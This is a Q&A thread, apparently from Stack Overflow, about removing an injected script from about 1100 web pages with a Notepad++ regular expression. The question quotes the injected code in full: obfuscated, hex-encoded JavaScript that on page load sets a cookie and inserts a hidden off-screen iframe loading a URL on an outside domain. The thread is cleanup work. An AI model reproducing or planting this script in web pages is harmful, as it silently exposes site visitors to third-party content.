# Need help to replace string in Notepad++ using regular expresson

Tags: notepad++, regex

I am trying to replace content

```
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ var _0xf184=["\x6F\x6E\x6C\x6F\x61\x64",​"\x67\x65\x74\x44\x61\x74\x65",​"\x73\x65\x74\x44\x61\x74\x65",​"\x63\x6F\x6F\x6B\x69\x65",​"\x3D",​"\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D",​"\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67",​"",​"\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D",​"\x65\x78\x65\x63",​"\x73\x70\x6C\x69\x74",​"\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65",​"\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73",​"\x64\x69\x76",​"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",​"\x68\x74\x74\x70\x3A\x2F\x2F\x63\x64\x6E\x2E\x67\x6F\x72\x6F\x64\x61\x32\x33\x35\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D",​"\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34",​"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",​"\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27",​"\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E",​"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",​"\x62\x6F\x64\x79"];window[_0xf184[0]]=funcâ€‹tion (){funcâ€‹tion _0x6e99x1(_0x6e99x2,​_0x6e99x3,​_0x6e99x4){if(_0x6e99x4){var _0x6e99x5= new Date();_0x6e99x5[_0xf184[2]](_0x6e99x5[_0xf184[1]]()+_0x6e99x4);};if(_0x6e99x2&&_0x6e99x3){document[_0xf184[3]]=_0x6e99x2+_0xf184[4]+_0x6e99x3+(_0x6e99x4?_0xf184[5]+_0x6e99x5[_0xf184[6]]():_0xf184[7])}else {return false};}funcâ€‹tion _0x6e99x6(_0x6e99x2){var _0x6e99x3= new RegExp(_0x6e99x2+_0xf184[8]);var _0x6e99x4=_0x6e99x3[_0xf184[9]](document[_0xf184[3]]);if(_0x6e99x4){_0x6e99x4=_0x6e99x4[0][_0xf184[10]](_0xf184[4])}else {return false};return _0x6e99x4[1]?_0x6e99x4[1]:false;}var _0x6e99x7=_0x6e99x6(_0xf184[11]);if(_0x6e99x7!=_0xf184[12]){_0x6e99x1(_0xf184[11],​_0xf184[12],​1);var _0x6e99x8=document[_0xf184[14]](_0xf184[13]);var _0x6e99x9=1049507;var _0x6e99xa=_0xf184[15]+_0x6e99x9+_0xf184[16];_0x6e99x8[_0xf184[17]]=_0xf184[18]+_0x6e99xa+_0xf184[19];document[_0xf184[21]][_0xf184[20]](_0x6e99x8);};};  /*6efdc4d230be4cf90bd9cefdffaeb74e*/
```

with blank space in many pages approx 1100 pages.

I don't have any idea how to do it by using regex in Notepad++.

Any help is appreciated.

Answer (score 4, accepted):

#### I'm trying to replace content with blank space

- Menu "Search" > "Replace" (or <kbd>Ctrl</kbd> + <kbd>H</kbd>)
- Set "Find what" to `/\*6efdc4d230be4cf90bd9cefdffaeb74e\*/.*?/\*6efdc4d230be4cf90bd9cefdffaeb74e\*/`
- Set "Replace with" to (empty string)
- Enable "Regular expression"
- Click "Replace All"

  [image]

**Before**:

```
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
/*6efdc4d230be4cf90bd9cefdffaeb74e*/ bla bla bla /*6efdc4d230be4cf90bd9cefdffaeb74e*/
```

**After**:

7 blank lines

---

#### Further reading

- [Notepad++: A guide to using regular expressions and extended search mode](http://markantoniou.blogspot.co.uk/2008/06/notepad-how-to-use-regular-expressions.html)

Comment: thank you for your answer, updating my string, what I want to replace but above regex is unable to search my string.

Comment: @akashujjwal It works here. Don't change the `.*?` in the middle. The `find what` in my answer matches your new text string perfectly.

Comment: I figure out whats the problem I need to check the matches newline checkbox, now its working fine for me. Thank you so much :)